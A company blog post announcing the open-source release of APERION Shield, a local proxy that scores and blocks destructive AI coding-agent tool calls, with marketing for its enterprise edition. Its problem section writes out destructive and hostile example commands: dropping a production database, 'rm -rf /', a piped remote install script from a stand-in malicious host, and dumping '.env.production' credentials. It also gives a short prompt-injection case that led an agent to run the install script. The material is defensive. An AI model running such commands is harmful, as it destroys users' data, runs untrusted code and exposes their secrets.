Why We Open-Sourced Shield

Why We Open-Sourced Shield

On May 13, 2026, we released APERION Shield as Apache 2.0 open source.

Shield is a 6MB Rust binary that wraps any MCP server and blocks destructive AI agent operations before they execute. Five-signal adaptive scoring. Forty-five starter rules across twelve categories. Single brew install on macOS. No telemetry. No account. Single download on Linux.

The repository: github.com/AperionAI/shield.

The license: Apache 2.0. Same engine ships in our enterprise product, SmartFlow Shield. We took the runtime control layer that already existed in the enterprise edition and made the developer-tier version free, permanent, and unrestricted.

This post explains why.

The problem

AI coding agents inside Cursor, Claude Code, GitHub Copilot Agent, and similar tools now have tool-use capabilities. The agent does not just suggest code. It executes commands.

The execution path looks like this. Developer prompts the agent for a feature change. Agent reasons about the task, decides what tools it needs, and invokes them. The tool might be a database query. It might be a filesystem operation. It might be a git command. It might be a curl call to an external API. It might be a shell command in the developer’s local environment.

In most setups, the developer does not see the tool call before it executes. Some tools auto-approve. Some tools require confirmation but the confirmation UI is designed to be fast, not careful. By the time the developer notices an unintended action, the action has happened.

Common patterns the agent will produce, that look reasonable in context, that we have seen in production:

DROP DATABASE production_users;

The agent thought it was generating a fresh migration. It found the existing production database, decided it needed a clean slate, and dropped it before running the new schema.

rm -rf /

The agent thought it was cleaning up a temporary directory. It resolved the path relative to root because of a string interpolation bug in the prompt. It ran the command before the developer reviewed the prompt.

git push --force main

The agent thought it was reconciling a rebase. The remote had two commits the agent didn’t know about. Force push lost them.

curl https://malicious.example.com/install.sh | sh

The agent thought it was following installation instructions from a tool’s documentation. The instructions were generated by a prompt injection on a documentation site the agent crawled.

cat .env.production >> /tmp/agent_log.txt

The agent thought it was diagnosing a configuration issue. It dumped production credentials to a log file an attacker can read.

These are not hypothetical. They are happening now in real development environments. The PocketOS incident in May 2026 was one public example where an autonomous coding agent took destructive action that the founder discovered only after the fact in the system logs.

Why static rules do not work

The naive solution is a denylist. Match the command. If the command contains DROP DATABASE or rm -rf, block it.

Static rules fail in three ways.

They false-positive on legitimate operations. DROP DATABASE in a development environment is fine. rm -rf in a docker container that is about to be destroyed is fine. git push –force on a personal branch is fine. A denylist that blocks all instances of these patterns blocks too much and developers turn it off within a day.

They false-negative on novel forms. An attacker who knows about the denylist generates command variants that achieve the same destructive outcome through different syntax. DELETE FROM users WHERE 1=1 produces the same result as DROP TABLE users. A denylist that matches DROP does not match DELETE.

They cannot evaluate context. The command itself is not the unit of risk. The combination of the command, the environment where it runs, the target it operates against, and the operational history of recent commands is the unit of risk. Static rules cannot see context.

How Shield actually works

Shield evaluates every tool call against five signals. The signals combine into a severity score. The score determines whether the call proceeds, blocks, or escalates for human approval.

Signal 1: command pattern matching. This is the static layer. Destructive patterns get a base score. The base score is one input to the final decision, not the decision itself.

Signal 2: workspace context probe. Shield inspects the working directory, the environment variables, the git branch, and the file system before scoring the call. A DROP DATABASE call against a database named *_prod or *_production gets escalated. A DROP DATABASE call against *_test or *_dev does not. Same command. Different score. Because the context tells Shield this is production.

Signal 3: local decision memory. Shield remembers what the user has previously approved. If the user approved git push –force main twice this week against the same branch, the third invocation gets a lower score because the user has demonstrated they understand and accept the operation. If the user has never approved a similar action, the score is higher.

Signal 4: burst detector. Shield tracks the rate of destructive operations. Five destructive operations in five minutes is a different signal than one destructive operation a day. The burst pattern often indicates an agent in an exception loop, retrying the same destructive action with variations until something works. Shield blocks the burst before the loop completes.

Signal 5: safer alternative suggestion. When Shield blocks an operation, it does not just block. It suggests what the agent could do instead. DROP DATABASE production gets blocked with a suggestion to use a versioned migration tool. rm -rf gets blocked with a suggestion to use a temporary directory and cleanup hook. git push –force gets blocked with a suggestion to use git push –force-with-lease which respects remote commits the local doesn’t know about.

The combination of these five signals produces a false-positive rate that is manageable on real developer workflows. Static-rule guardrails fail this test in the first hour. Adaptive scoring lets the tool actually stay enabled long enough to be useful.

Why we made it free

Shield is the same engine as SmartFlow Shield, our enterprise product. The enterprise tier adds team-wide policy management, id.me biometric step-up for high-severity operations, identity-bound audit, and integration with the broader SmartFlow runtime governance stack. The single-developer Shield runs locally with no cloud dependency.

Three reasons we open-sourced the developer tier.

The supply chain argument. Software supply chains are broken. The March 2026 LiteLLM incident proved it. 95 million monthly Python downloads. Thirty-six percent of cloud environments. One supply chain compromise. The entire package quarantined on PyPI within hours. Every enterprise running LiteLLM in production scrambled to verify whether their secrets had been exfiltrated.

A guardrail that protects developers from this category of attack should not be paywalled. A paywalled guardrail does not run on the laptops where the attack happens. Shield wraps the MCP server, blocks the destructive operation, and runs locally with no network dependency. If it was a paid product, fewer developers would run it. If fewer developers run it, the next supply chain attack damages more enterprises.

The talent argument. The next generation of senior engineers will encounter AI coding agents as a default development environment in their first jobs. The mental model they form about how to govern those agents will shape enterprise procurement decisions for the next decade. If the mental model they form is “guardrails are an enterprise product I cannot afford,” they will deploy without guardrails. If the mental model they form is “guardrails are a free, default-on, single-binary install,” they will deploy with them.

We would rather subsidize the right default than monetize the broken one.

The market education argument. Most enterprise CISOs do not yet understand that AI coding agents now have shell access on developer laptops. The conversation that produces understanding starts with developers showing their security teams what Shield blocks. The faster developers can run Shield and produce that evidence, the faster the CISO conversation happens. The faster the CISO conversation happens, the faster the enterprise procurement cycle starts for SmartFlow Shield.

Open source as market education is a known pattern. We chose to use it.

What Shield does not do

Shield does not detect prompt injection inside the agent’s reasoning step. The agent’s reasoning happens in the model, not in Shield’s tool call layer. Prompt injection defense is a SmartFlow capability at Layer 3 of the Trust Fabric. Shield handles the tool call boundary; SmartFlow handles the model call boundary.

Shield does not enforce data loss prevention on file content. If the agent reads a file that contains PII and includes the PII in a tool call, Shield evaluates the tool call. It does not classify the data. DLP classification is a SmartFlow capability.

Shield does not provide identity-bound audit. The local Shield logs decisions locally. The enterprise tier ties decisions to verified identity via id.me and produces tamper-evident audit logs. The free Shield is for the developer; the audit is for the enterprise.

These are not gaps. They are the right scope split between a free developer tool and an enterprise product.

Get started

Install:

brew install aperion-ai/tap/shield

Run as MCP proxy:

shield wrap --upstream postgres://localhost

Or embed as a Rust crate:

cargo add aperion-shield

Repository, issues, contribution guide:

github.com/AperionAI/shield

Apache 2.0. No account. No telemetry. No cloud dependency. Forty-five starter rules across twelve categories: SQL, git, filesystem, secrets, supply chain, cloud, Kubernetes, Docker, LLM planning, anomaly, identity, network.

We will keep shipping improvements. Issue tracker open. PR contributions welcome. Bi-weekly minor version cadence.


Technical companion: APERION Shield documentation. Full rule reference, configuration patterns, integration with Cursor and Claude Code, embeddable Rust crate API.

Enterprise tier: SmartFlow Shield. Team policy management, identity-bound audit, id.me biometric step-up, fleet manager.

Where Shield fits in the Trust Fabric architecture:Trust Fabric page. Layer 3 developer tier.

Craig Alberino
Craig Alberino
Craig Alberino is the CEO and Founder of LangSmart, which provides Smartflow — the enterprise AI gateway, firewall, and control plane for Fortune 500 companies.

Ready to govern your AI infrastructure?

See how SmartFlow gives regulated industries complete AI sovereignty.

Request a Demo View Documentation